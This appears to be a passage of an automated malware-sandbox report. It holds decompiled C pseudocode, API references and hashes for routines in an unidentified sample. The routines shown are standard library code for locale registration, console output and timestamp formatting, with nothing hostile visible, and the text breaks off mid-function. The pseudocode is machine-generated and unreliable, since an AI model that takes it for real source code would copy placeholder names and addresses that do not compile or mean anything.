                          							 *(_t249 - 4) = 1;
                          							E0131792B(__eflags, _t230);
                          							 *0x1374358();
                          							 *((intOrPtr*)( *((intOrPtr*)( *_t230 + 4))))();
                          							 *0x13aaaa8 = _t230;
                          							goto L5;
                          						}
                          					} else {
                          						_t230 = _t236;
                          						goto L5;
                          					}
                          				}
                          			}





















                          APIs
                          • std::_Lockit::_Lockit.LIBCPMT ref: 0132B143
                            • Part of subcall function 012F9850: std::_Lockit::_Lockit.LIBCPMT ref: 012F986D
                            • Part of subcall function 012F9850: std::_Lockit::~_Lockit.LIBCPMT ref: 012F9889
                          • std::_Facet_Register.LIBCPMT ref: 0132B194
                          • std::_Lockit::~_Lockit.LIBCPMT ref: 0132B1B4
                          • Concurrency::cancel_current_task.LIBCPMT ref: 0132B1C1
                          Memory Dump Source
                          • Source File: 00000002.00000002.310271306.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true
                          • Associated: 00000002.00000002.310248399.00000000012F0000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310685959.0000000001374000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310722867.0000000001396000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310747166.00000000013A4000.00000004.00020000.sdmp
                          • Associated: 00000002.00000002.310762956.00000000013A8000.00000008.00020000.sdmp
                          • Associated: 00000002.00000002.310772796.00000000013AA000.00000004.00020000.sdmp
                          • Associated: 00000002.00000002.310784553.00000000013AC000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_12f0000_ab.jbxd
                          Similarity
                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                          • String ID:
                          • API String ID: 2081738530-0
                          • Opcode ID: 170a8b3d78bff4f59afc09fdac168b6ce08e274257ce503112c393f94d6694ec
                          • Instruction ID: 1a168be6b1f4b5c1f2a8dc69c66a845509f7646d5ae69aa0cf3df1494b4b4c81
                          • Opcode Fuzzy Hash: 170a8b3d78bff4f59afc09fdac168b6ce08e274257ce503112c393f94d6694ec
                          • Instruction Fuzzy Hash: A301F9369002269BDF15FB68C4546BEFBB9EF54328F24000CD51167384DF34AD45CB80
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 71%
                          			E0132B1C7(void* __eflags, void* __fp0) {
                          				signed int _t71;
                          				void* _t120;
                          				signed int _t177;
                          				void* _t193;
                          				signed int _t195;
                          				signed int _t196;
                          				signed int _t197;
                          				signed int _t198;
                          				signed int _t199;
                          				signed int _t200;
                          				signed int _t201;
                          				signed int _t202;
                          				signed int _t203;
                          				signed int _t204;
                          				void* _t210;
                          
                          				_t214 = __fp0;
                          				_push(8);
                          				E0132F1B6(0x1368615, __eflags);
                          				E013177B6(_t210 - 0x14, 0);
                          				_t199 =  *0x13aaaac; // 0x0
                          				 *(_t210 - 4) =  *(_t210 - 4) & 0x00000000;
                          				 *(_t210 - 0x10) = _t199;
                          				_t71 = E012F9A10( *((intOrPtr*)(_t210 + 8)), E012F9850(0x13aaa8c));
                          				_t194 = _t71;
                          				if(_t71 != 0) {
                          					L5:
                          					E0131780E(_t210 - 0x14);
                          					return E0132F190(_t194, _t213);
                          				} else {
                          					_t213 = _t199;
                          					if(_t199 == 0) {
                          						_push( *((intOrPtr*)(_t210 + 8)));
                          						_push(_t210 - 0x10);
                          						__eflags = E0132B729(_t199, __eflags) - 0xffffffff;
                          						if(__eflags == 0) {
                          							E012F9060();
                          							asm("int3");
                          							_push(8);
                          							E0132F1B6(0x1368615, __eflags);
                          							E013177B6(_t210 - 0x14, 0);
                          							_t200 =  *0x13aaab4; // 0x0
                          							 *(_t210 - 4) =  *(_t210 - 4) & 0x00000000;
                          							 *(_t210 - 0x10) = _t200;
                          							_t195 = E012F9A10( *((intOrPtr*)(_t210 + 8)), E012F9850(0x13aaa94));
                          							__eflags = _t195;
                          							if(_t195 != 0) {
                          								L12:
                          								E0131780E(_t210 - 0x14);
                          								return E0132F190(_t195, __eflags);
                          							} else {
                          								__eflags = _t200;
                          								if(__eflags == 0) {
                          									_push( *((intOrPtr*)(_t210 + 8)));
                          									_push(_t210 - 0x10);
                          									__eflags = E0132B791(_t200, __eflags, __fp0) - 0xffffffff;
                          									if(__eflags == 0) {
                          										E012F9060();
                          										asm("int3");
                          										_push(8);
                          										E0132F1B6(0x1368615, __eflags);
                          										E013177B6(_t210 - 0x14, 0);
                          										_t201 =  *0x13aaab0; // 0x0
                          										 *(_t210 - 4) =  *(_t210 - 4) & 0x00000000;
                          										 *(_t210 - 0x10) = _t201;
                          										_t196 = E012F9A10( *((intOrPtr*)(_t210 + 8)), E012F9850(0x13aaa90));
                          										__eflags = _t196;
                          										if(_t196 != 0) {
                          											L19:
                          											E0131780E(_t210 - 0x14);
                          											return E0132F190(_t196, __eflags);
                          										} else {
                          											__eflags = _t201;
                          											if(__eflags == 0) {
                          												_push( *((intOrPtr*)(_t210 + 8)));
                          												_push(_t210 - 0x10);
                          												__eflags = E0132B815(_t201, __eflags, __fp0) - 0xffffffff;
                          												if(__eflags == 0) {
                          													E012F9060();
                          													asm("int3");
                          													_push(8);
                          													E0132F1B6(0x1368615, __eflags);
                          													E013177B6(_t210 - 0x14, 0);
                          													_t202 =  *0x13aaab8; // 0x0
                          													 *(_t210 - 4) =  *(_t210 - 4) & 0x00000000;
                          													 *(_t210 - 0x10) = _t202;
                          													_t197 = E012F9A10( *((intOrPtr*)(_t210 + 8)), E012F9850(0x13aaa98));
                          													__eflags = _t197;
                          													if(_t197 != 0) {
                          														L26:
                          														E0131780E(_t210 - 0x14);
                          														return E0132F190(_t197, __eflags);
                          													} else {
                          														__eflags = _t202;
                          														if(__eflags == 0) {
                          															_push( *((intOrPtr*)(_t210 + 8)));
                          															_push(_t210 - 0x10);
                          															__eflags = E0132B89A(__eflags, __fp0) - 0xffffffff;
                          															if(__eflags == 0) {
                          																E012F9060();
                          																asm("int3");
                          																_push(8);
                          																E0132F1B6(0x1368615, __eflags);
                          																E013177B6(_t210 - 0x14, 0);
                          																_t203 =  *0x13aaabc; // 0x0
                          																 *(_t210 - 4) =  *(_t210 - 4) & 0x00000000;
                          																 *(_t210 - 0x10) = _t203;
                          																_t198 = E012F9A10( *((intOrPtr*)(_t210 + 8)), E012F9850(0x13aaa9c));
                          																__eflags = _t198;
                          																if(_t198 != 0) {
                          																	L33:
                          																	E0131780E(_t210 - 0x14);
                          																	return E0132F190(_t198, __eflags);
                          																} else {
                          																	__eflags = _t203;
                          																	if(__eflags == 0) {
                          																		_push( *((intOrPtr*)(_t210 + 8)));
                          																		_push(_t210 - 0x10);
                          																		_t120 = E0132B906(_t193, _t203, __eflags);
                          																		_pop(_t177);
                          																		__eflags = _t120 - 0xffffffff;
                          																		if(__eflags == 0) {
                          																			E012F9060();
                          																			asm("int3");
                          																			_push(4);
                          																			E0132F1B6(0x1368ad3, __eflags);
                          																			_t204 = _t177;
                          																			 *(_t210 - 0x10) = _t204;
                          																			 *((intOrPtr*)(_t204 + 4)) =  *((intOrPtr*)(_t210 + 0xc));
                          																			_push( *((intOrPtr*)(_t210 + 8)));
                          																			_t65 = _t210 - 4;
                          																			 *_t65 =  *(_t210 - 4) & 0x00000000;
                          																			__eflags =  *_t65;
                          																			 *_t204 = 0x1376c58;
                          																			E0132C81A(_t177, _t193, __eflags, _t214);
                          																			return E0132F190(_t204, __eflags);
                          																		} else {
                          																			_t198 =  *(_t210 - 0x10);
                          																			 *(_t210 - 0x10) = _t198;
                          																			 *(_t210 - 4) = 1;
                          																			E0131792B(__eflags, _t198);
                          																			 *0x1374358();
                          																			 *((intOrPtr*)( *((intOrPtr*)( *_t198 + 4))))();
                          																			 *0x13aaabc = _t198;
                          																			goto L33;
                          																		}
                          																	} else {
                          																		_t198 = _t203;
                          																		goto L33;
                          																	}
                          																}
                          															} else {
                          																_t197 =  *(_t210 - 0x10);
                          																 *(_t210 - 0x10) = _t197;
                          																 *(_t210 - 4) = 1;
                          																E0131792B(__eflags, _t197);
                          																 *0x1374358();
                          																 *((intOrPtr*)( *((intOrPtr*)( *_t197 + 4))))();
                          																 *0x13aaab8 = _t197;
                          																goto L26;
                          															}
                          														} else {
                          															_t197 = _t202;
                          															goto L26;
                          														}
                          													}
                          												} else {
                          													_t196 =  *(_t210 - 0x10);
                          													 *(_t210 - 0x10) = _t196;
                          													 *(_t210 - 4) = 1;
                          													E0131792B(__eflags, _t196);
                          													 *0x1374358();
                          													 *((intOrPtr*)( *((intOrPtr*)( *_t196 + 4))))();
                          													 *0x13aaab0 = _t196;
                          													goto L19;
                          												}
                          											} else {
                          												_t196 = _t201;
                          												goto L19;
                          											}
                          										}
                          									} else {
                          										_t195 =  *(_t210 - 0x10);
                          										 *(_t210 - 0x10) = _t195;
                          										 *(_t210 - 4) = 1;
                          										E0131792B(__eflags, _t195);
                          										 *0x1374358();
                          										 *((intOrPtr*)( *((intOrPtr*)( *_t195 + 4))))();
                          										 *0x13aaab4 = _t195;
                          										goto L12;
                          									}
                          								} else {
                          									_t195 = _t200;
                          									goto L12;
                          								}
                          							}
                          						} else {
                          							_t194 =  *(_t210 - 0x10);
                          							 *(_t210 - 0x10) = _t194;
                          							 *(_t210 - 4) = 1;
                          							E0131792B(__eflags, _t194);
                          							 *0x1374358();
                          							 *((intOrPtr*)( *((intOrPtr*)( *_t194 + 4))))();
                          							 *0x13aaaac = _t194;
                          							goto L5;
                          						}
                          					} else {
                          						_t194 = _t199;
                          						goto L5;
                          					}
                          				}
                          			}



















                          APIs
                          • std::_Lockit::_Lockit.LIBCPMT ref: 0132B1D8
                            • Part of subcall function 012F9850: std::_Lockit::_Lockit.LIBCPMT ref: 012F986D
                            • Part of subcall function 012F9850: std::_Lockit::~_Lockit.LIBCPMT ref: 012F9889
                          • std::_Facet_Register.LIBCPMT ref: 0132B229
                          • std::_Lockit::~_Lockit.LIBCPMT ref: 0132B249
                          • Concurrency::cancel_current_task.LIBCPMT ref: 0132B256
                          Memory Dump Source
                          • Source File: 00000002.00000002.310271306.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true
                          • Associated: 00000002.00000002.310248399.00000000012F0000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310685959.0000000001374000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310722867.0000000001396000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310747166.00000000013A4000.00000004.00020000.sdmp
                          • Associated: 00000002.00000002.310762956.00000000013A8000.00000008.00020000.sdmp
                          • Associated: 00000002.00000002.310772796.00000000013AA000.00000004.00020000.sdmp
                          • Associated: 00000002.00000002.310784553.00000000013AC000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_12f0000_ab.jbxd
                          Similarity
                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                          • String ID:
                          • API String ID: 2081738530-0
                          • Opcode ID: 0e4fd312cb4e2c76a596e526dcd77c920c8830883197022a99e617c30758631d
                          • Instruction ID: df9a6872084aabefc83720aa483c7c0e0242a0f6053c330f80e913d8979c1e22
                          • Opcode Fuzzy Hash: 0e4fd312cb4e2c76a596e526dcd77c920c8830883197022a99e617c30758631d
                          • Instruction Fuzzy Hash: 1301D6369003268BDF16FFA8C4546BEF7B9AF94318F280048E51167284DF349905CF80
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 71%
                          			E0132B386(void* __eflags, void* __fp0) {
                          				signed int _t35;
                          				void* _t51;
                          				signed int _t78;
                          				void* _t85;
                          				signed int _t87;
                          				signed int _t88;
                          				signed int _t89;
                          				signed int _t90;
                          				void* _t93;
                          
                          				_push(8);
                          				E0132F1B6(0x1368615, __eflags);
                          				E013177B6(_t93 - 0x14, 0);
                          				_t88 =  *0x13aaab8; // 0x0
                          				 *(_t93 - 4) =  *(_t93 - 4) & 0x00000000;
                          				 *(_t93 - 0x10) = _t88;
                          				_t35 = E012F9A10( *((intOrPtr*)(_t93 + 8)), E012F9850(0x13aaa98));
                          				_t86 = _t35;
                          				if(_t35 != 0) {
                          					L5:
                          					E0131780E(_t93 - 0x14);
                          					return E0132F190(_t86, _t96);
                          				} else {
                          					_t96 = _t88;
                          					if(_t88 == 0) {
                          						_push( *((intOrPtr*)(_t93 + 8)));
                          						_push(_t93 - 0x10);
                          						__eflags = E0132B89A(__eflags, __fp0) - 0xffffffff;
                          						if(__eflags == 0) {
                          							E012F9060();
                          							asm("int3");
                          							_push(8);
                          							E0132F1B6(0x1368615, __eflags);
                          							E013177B6(_t93 - 0x14, 0);
                          							_t89 =  *0x13aaabc; // 0x0
                          							 *(_t93 - 4) =  *(_t93 - 4) & 0x00000000;
                          							 *(_t93 - 0x10) = _t89;
                          							_t87 = E012F9A10( *((intOrPtr*)(_t93 + 8)), E012F9850(0x13aaa9c));
                          							__eflags = _t87;
                          							if(_t87 != 0) {
                          								L12:
                          								E0131780E(_t93 - 0x14);
                          								return E0132F190(_t87, __eflags);
                          							} else {
                          								__eflags = _t89;
                          								if(__eflags == 0) {
                          									_push( *((intOrPtr*)(_t93 + 8)));
                          									_push(_t93 - 0x10);
                          									_t51 = E0132B906(_t85, _t89, __eflags);
                          									_pop(_t78);
                          									__eflags = _t51 - 0xffffffff;
                          									if(__eflags == 0) {
                          										E012F9060();
                          										asm("int3");
                          										_push(4);
                          										E0132F1B6(0x1368ad3, __eflags);
                          										_t90 = _t78;
                          										 *(_t93 - 0x10) = _t90;
                          										 *((intOrPtr*)(_t90 + 4)) =  *((intOrPtr*)(_t93 + 0xc));
                          										_push( *((intOrPtr*)(_t93 + 8)));
                          										_t29 = _t93 - 4;
                          										 *_t29 =  *(_t93 - 4) & 0x00000000;
                          										__eflags =  *_t29;
                          										 *_t90 = 0x1376c58;
                          										E0132C81A(_t78, _t85, __eflags, __fp0);
                          										return E0132F190(_t90, __eflags);
                          									} else {
                          										_t87 =  *(_t93 - 0x10);
                          										 *(_t93 - 0x10) = _t87;
                          										 *(_t93 - 4) = 1;
                          										E0131792B(__eflags, _t87);
                          										 *0x1374358();
                          										 *((intOrPtr*)( *((intOrPtr*)( *_t87 + 4))))();
                          										 *0x13aaabc = _t87;
                          										goto L12;
                          									}
                          								} else {
                          									_t87 = _t89;
                          									goto L12;
                          								}
                          							}
                          						} else {
                          							_t86 =  *(_t93 - 0x10);
                          							 *(_t93 - 0x10) = _t86;
                          							 *(_t93 - 4) = 1;
                          							E0131792B(__eflags, _t86);
                          							 *0x1374358();
                          							 *((intOrPtr*)( *((intOrPtr*)( *_t86 + 4))))();
                          							 *0x13aaab8 = _t86;
                          							goto L5;
                          						}
                          					} else {
                          						_t86 = _t88;
                          						goto L5;
                          					}
                          				}
                          			}













                          APIs
                          • std::_Lockit::_Lockit.LIBCPMT ref: 0132B397
                            • Part of subcall function 012F9850: std::_Lockit::_Lockit.LIBCPMT ref: 012F986D
                            • Part of subcall function 012F9850: std::_Lockit::~_Lockit.LIBCPMT ref: 012F9889
                          • std::_Facet_Register.LIBCPMT ref: 0132B3E8
                          • std::_Lockit::~_Lockit.LIBCPMT ref: 0132B408
                          • Concurrency::cancel_current_task.LIBCPMT ref: 0132B415
                          Memory Dump Source
                          • Source File: 00000002.00000002.310271306.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true
                          • Associated: 00000002.00000002.310248399.00000000012F0000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310685959.0000000001374000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310722867.0000000001396000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310747166.00000000013A4000.00000004.00020000.sdmp
                          • Associated: 00000002.00000002.310762956.00000000013A8000.00000008.00020000.sdmp
                          • Associated: 00000002.00000002.310772796.00000000013AA000.00000004.00020000.sdmp
                          • Associated: 00000002.00000002.310784553.00000000013AC000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_12f0000_ab.jbxd
                          Similarity
                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                          • String ID:
                          • API String ID: 2081738530-0
                          • Opcode ID: 4ddfa748c9d54c5e6c64bce7efe133d5d658a7bc34bf0c24d67ed4b507b6787b
                          • Instruction ID: a81e839ed2b68548bdc428f1b247d6226ea2c52baf406dec4d762ab8011569a2
                          • Opcode Fuzzy Hash: 4ddfa748c9d54c5e6c64bce7efe133d5d658a7bc34bf0c24d67ed4b507b6787b
                          • Instruction Fuzzy Hash: 2301D2369102268BDF19FF68C4546BEBBB9AF94728F240408E6156B388DF349D45CB80
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 71%
                          			E0132B41B(void* __eflags, void* __fp0) {
                          				intOrPtr* _t23;
                          				void* _t28;
                          				intOrPtr* _t45;
                          				void* _t49;
                          				intOrPtr* _t51;
                          				intOrPtr* _t52;
                          				void* _t54;
                          
                          				_push(8);
                          				E0132F1B6(0x1368615, __eflags);
                          				E013177B6(_t54 - 0x14, 0);
                          				_t51 =  *0x13aaabc; // 0x0
                          				 *(_t54 - 4) =  *(_t54 - 4) & 0x00000000;
                          				 *((intOrPtr*)(_t54 - 0x10)) = _t51;
                          				_t23 = E012F9A10( *((intOrPtr*)(_t54 + 8)), E012F9850(0x13aaa9c));
                          				_t50 = _t23;
                          				if(_t23 != 0) {
                          					L5:
                          					E0131780E(_t54 - 0x14);
                          					return E0132F190(_t50, _t57);
                          				} else {
                          					_t57 = _t51;
                          					if(_t51 == 0) {
                          						_push( *((intOrPtr*)(_t54 + 8)));
                          						_push(_t54 - 0x10);
                          						_t28 = E0132B906(_t49, _t51, __eflags);
                          						_pop(_t45);
                          						__eflags = _t28 - 0xffffffff;
                          						if(__eflags == 0) {
                          							E012F9060();
                          							asm("int3");
                          							_push(4);
                          							E0132F1B6(0x1368ad3, __eflags);
                          							_t52 = _t45;
                          							 *((intOrPtr*)(_t54 - 0x10)) = _t52;
                          							 *((intOrPtr*)(_t52 + 4)) =  *((intOrPtr*)(_t54 + 0xc));
                          							_push( *((intOrPtr*)(_t54 + 8)));
                          							_t17 = _t54 - 4;
                          							 *_t17 =  *(_t54 - 4) & 0x00000000;
                          							__eflags =  *_t17;
                          							 *_t52 = 0x1376c58;
                          							E0132C81A(_t45, _t49, __eflags, __fp0);
                          							return E0132F190(_t52, __eflags);
                          						} else {
                          							_t50 =  *((intOrPtr*)(_t54 - 0x10));
                          							 *((intOrPtr*)(_t54 - 0x10)) = _t50;
                          							 *(_t54 - 4) = 1;
                          							E0131792B(__eflags, _t50);
                          							 *0x1374358();
                          							 *((intOrPtr*)( *((intOrPtr*)( *_t50 + 4))))();
                          							 *0x13aaabc = _t50;
                          							goto L5;
                          						}
                          					} else {
                          						_t50 = _t51;
                          						goto L5;
                          					}
                          				}
                          			}











                          APIs
                          • std::_Lockit::_Lockit.LIBCPMT ref: 0132B42C
                            • Part of subcall function 012F9850: std::_Lockit::_Lockit.LIBCPMT ref: 012F986D
                            • Part of subcall function 012F9850: std::_Lockit::~_Lockit.LIBCPMT ref: 012F9889
                          • std::_Facet_Register.LIBCPMT ref: 0132B47D
                          • std::_Lockit::~_Lockit.LIBCPMT ref: 0132B49D
                          • Concurrency::cancel_current_task.LIBCPMT ref: 0132B4AA
                          Memory Dump Source
                          • Source File: 00000002.00000002.310271306.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true
                          • Associated: 00000002.00000002.310248399.00000000012F0000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310685959.0000000001374000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310722867.0000000001396000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310747166.00000000013A4000.00000004.00020000.sdmp
                          • Associated: 00000002.00000002.310762956.00000000013A8000.00000008.00020000.sdmp
                          • Associated: 00000002.00000002.310772796.00000000013AA000.00000004.00020000.sdmp
                          • Associated: 00000002.00000002.310784553.00000000013AC000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_12f0000_ab.jbxd
                          Similarity
                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                          • String ID:
                          • API String ID: 2081738530-0
                          • Opcode ID: 397b285e5c04c0e0e2c37140ce0e26ce2d85ddef91ba71d897088b05c6135267
                          • Instruction ID: 448286822e59f8819f340ec9aa3135b5bcf1a1e9a45cc8fb76222d4863b6bd42
                          • Opcode Fuzzy Hash: 397b285e5c04c0e0e2c37140ce0e26ce2d85ddef91ba71d897088b05c6135267
                          • Instruction Fuzzy Hash: F701C4369102269BDB16FB68C4546BDF7B9AFA4328F24400DD51567284CF709905CB80
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E01363E15(void* _a4, long _a8, DWORD* _a12) {
                          				void* _t13;
                          
                          				_t13 = WriteConsoleW( *0x13a4aa0, _a4, _a8, _a12, 0);
                          				if(_t13 == 0 && GetLastError() == 6) {
                          					E01363DFE();
                          					E01363DC0();
                          					_t13 = WriteConsoleW( *0x13a4aa0, _a4, _a8, _a12, _t13);
                          				}
                          				return _t13;
                          			}





                          APIs
                          • WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,00000000,?,013635F3,00000000,00000001,00000000,00000000,?,0135F7F4,?,?,00000000), ref: 01363E2C
                          • GetLastError.KERNEL32(?,013635F3,00000000,00000001,00000000,00000000,?,0135F7F4,?,?,00000000,?,00000000,?,0135FD40,00000020), ref: 01363E38
                            • Part of subcall function 01363DFE: CloseHandle.KERNEL32(FFFFFFFE,01363E48,?,013635F3,00000000,00000001,00000000,00000000,?,0135F7F4,?,?,00000000,?,00000000), ref: 01363E0E
                          • ___initconout.LIBCMT ref: 01363E48
                            • Part of subcall function 01363DC0: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,01363DEF,013635E0,00000000,?,0135F7F4,?,?,00000000,?), ref: 01363DD3
                          • WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,?,013635F3,00000000,00000001,00000000,00000000,?,0135F7F4,?,?,00000000,?), ref: 01363E5D
                          Memory Dump Source
                          • Source File: 00000002.00000002.310271306.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true
                          • Associated: 00000002.00000002.310248399.00000000012F0000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310685959.0000000001374000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310722867.0000000001396000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310747166.00000000013A4000.00000004.00020000.sdmp
                          • Associated: 00000002.00000002.310762956.00000000013A8000.00000008.00020000.sdmp
                          • Associated: 00000002.00000002.310772796.00000000013AA000.00000004.00020000.sdmp
                          • Associated: 00000002.00000002.310784553.00000000013AC000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_12f0000_ab.jbxd
                          Similarity
                          • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                          • String ID:
                          • API String ID: 2744216297-0
                          • Opcode ID: 818d5f21cbe11998cdd74ee5888df119d1bf7f138d66f38dda9cc2f0370e3ce0
                          • Instruction ID: 45fd8a83db4ab88ee53d9a24408d92e2d626aeba1f7b1bf22bde35b10c19ed57
                          • Opcode Fuzzy Hash: 818d5f21cbe11998cdd74ee5888df119d1bf7f138d66f38dda9cc2f0370e3ce0
                          • Instruction Fuzzy Hash: 20F01C37501255BFCF331F99EC049897F6EFB093A1F458024FA1D96164C7329860DB94
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 48%
                          			E01303210(void* __ebx, void* __ecx, void* __edx, void* __edi, char _a4) {
                          				intOrPtr _v0;
                          				signed int _v8;
                          				unsigned int _v12;
                          				unsigned int _v16;
                          				char _v17;
                          				signed int _v20;
                          				char _v24;
                          				unsigned int _v28;
                          				intOrPtr _v32;
                          				char _v44;
                          				char _v52;
                          				signed int _v80;
                          				signed int _v84;
                          				char _v88;
                          				signed int _v92;
                          				char _v96;
                          				signed int _v100;
                          				signed int _v104;
                          				char _v120;
                          				signed int _v124;
                          				short* _v128;
                          				signed int _v136;
                          				signed int* _v152;
                          				char _v168;
                          				intOrPtr _v172;
                          				char _v185;
                          				intOrPtr _v196;
                          				unsigned int _v200;
                          				intOrPtr _v208;
                          				intOrPtr _v220;
                          				void* __esi;
                          				void* __ebp;
                          				signed int _t154;
                          				signed int _t155;
                          				signed int _t162;
                          				signed int _t163;
                          				void* _t171;
                          				signed int _t185;
                          				char _t188;
                          				signed int* _t195;
                          				short* _t206;
                          				void* _t213;
                          				char _t215;
                          				short _t225;
                          				void* _t238;
                          				signed int _t240;
                          				short _t249;
                          				signed int _t251;
                          				void* _t254;
                          				signed int _t255;
                          				signed int _t256;
                          				signed int _t266;
                          				void* _t268;
                          				signed int _t269;
                          				signed int _t270;
                          				char _t281;
                          				short _t286;
                          				signed int _t287;
                          				signed int _t289;
                          				char _t290;
                          				signed int _t294;
                          				unsigned int _t295;
                          				short _t301;
                          				signed int _t302;
                          				unsigned int _t303;
                          				short* _t311;
                          				unsigned int _t313;
                          				unsigned int _t314;
                          				short* _t318;
                          				signed char* _t320;
                          				char _t322;
                          				intOrPtr _t323;
                          				signed int _t333;
                          				void* _t334;
                          				signed char* _t336;
                          				signed int _t337;
                          				intOrPtr _t338;
                          				intOrPtr _t339;
                          				short _t341;
                          				void* _t343;
                          				short _t346;
                          				void* _t348;
                          				short _t350;
                          				signed int _t353;
                          				void* _t354;
                          				void* _t355;
                          				void* _t357;
                          				void* _t359;
                          				void* _t360;
                          				void* _t362;
                          				void* _t380;
                          
                          				_t312 = __edx;
                          				_t268 = __ebx;
                          				_push(0xffffffff);
                          				_push(0x1366305);
                          				_push( *[fs:0x0]);
                          				_t154 =  *0x13a4018; // 0x39cca9f6
                          				_t155 = _t154 ^ _t353;
                          				_v20 = _t155;
                          				_push(__edi);
                          				_push(_t155);
                          				 *[fs:0x0] =  &_v16;
                          				_t318 = _a4;
                          				asm("xorps xmm0, xmm0");
                          				_v96 = _t318;
                          				_v128 = _t318;
                          				asm("movlpd [ebp-0x30], xmm0");
                          				E0134A72C(__ecx, __edx,  &_v52);
                          				_push( &_v52);
                          				_push( &_v88);
                          				E0134A14E();
                          				_t162 = _v84;
                          				_t359 = _t357 - 0x70 + 0xc;
                          				if(_t162 != 0x3b) {
                          					_t163 = _t162 + 1;
                          					__eflags = _t163;
                          					_v84 = _t163;
                          				} else {
                          					_t266 = _v80;
                          					if(_t266 >= 0x17) {
                          						_v80 = 0;
                          						_v84 = 0;
                          					} else {
                          						_v84 = 0;
                          						_v80 = _t266 + 1;
                          					}
                          				}
                          				_v28 = 0;
                          				_v24 = 0xf;
                          				_v44 = 0;
                          				_t333 = E012F57D0(_t268, _t312, _t318, 0x110);
                          				_v28 = 0x104;
                          				_v92 = _t333;
                          				_v24 = 0x10f;
                          				E013478D0(_t318, _t333, 0, 0x104);
                          				 *((char*)(_t333 + 0x104)) = 0;
                          				E012F5760( &_v44,  &_v92);
                          				_v8 = 0;
                          				_t170 =  >=  ? _v44 :  &_v44;
                          				_t171 = E0134A70D( >=  ? _v44 :  &_v44, _v28, "%Y-%m-%dT%H:%M:%S",  &_v88);
                          				_t360 = _t359 + 0x28;
                          				_push(0);
                          				if(_t171 == 0) {
                          					 *(_t318 + 0x10) = 0;
                          					 *(_t318 + 0x14) = 7;
                          					 *_t318 = 0;
                          					E012F51B0(_t268, _t318, _t318, _t333, 0x13836c0);
                          					_t281 = _v24;
                          					__eflags = _t281 - 0x10;
                          					if(_t281 >= 0x10) {
                          						_t286 = _t281 + 1;
                          						__eflags = _t286;
                          						_push(_t286);
                          						goto L19;
                          					}
                          					goto L20;
                          				} else {
                          					_push(_t171);
                          					_t287 =  &_v44;
                          					L23();
                          					_t178 =  >=  ? _v44 :  &_v44;
                          					_t336 =  &((E012F5640( >=  ? _v44 :  &_v44))[_v28]);
                          					_t181 =  >=  ? _v44 :  &_v44;
                          					_t320 = E012F5640( >=  ? _v44 :  &_v44);
                          					_v104 = 0;
                          					_v100 = 7;
                          					_v120 = 0;
                          					_t360 = _t360 + 8;
                          					_t185 = _t336 - _t320;
                          					_v124 = _t185;
                          					if(_t185 <= 7) {
                          						L13:
                          						_v96 =  &_v120;
                          						_v8 = 1;
                          						while(_t320 != _t336) {
                          							E012FC140(_t268,  &_v120, _t320, _t336,  *_t320 & 0x0000ffff);
                          							_t320 =  &(_t320[1]);
                          						}
                          						_t318 = _v128;
                          						asm("movups xmm0, [ebp-0x74]");
                          						_v120 = 0;
                          						_t188 = _v24;
                          						 *(_t318 + 0x10) = 0;
                          						 *(_t318 + 0x14) = 0;
                          						asm("movups [edi], xmm0");
                          						asm("movq xmm0, [ebp-0x64]");
                          						asm("movq [edi+0x10], xmm0");
                          						_v104 = 0;
                          						_v100 = 7;
                          						if(_t188 >= 0x10) {
                          							_push(_t188 + 1);
                          							L19:
                          							E012F56A0(_t268, _t318, _v44);
                          						}
                          						L20:
                          						 *[fs:0x0] = _v16;
                          						_pop(_t334);
                          						return E0132EA79(_v20 ^ _t353, _t334);
                          					} else {
                          						if(_t185 > 0x7ffffffe) {
                          							E012F4B30(_t287, __eflags);
                          							goto L22;
                          						} else {
                          							_t255 = _t185 | 0x00000007;
                          							_t380 = _t255 - 0x7ffffffe;
                          							if(_t380 <= 0) {
                          								__eflags = _t255 - 0xa;
                          								_t256 =  <  ? 0xa : _t255;
                          							} else {
                          								_t256 = 0x7ffffffe;
                          							}
                          							_v92 = _t256;
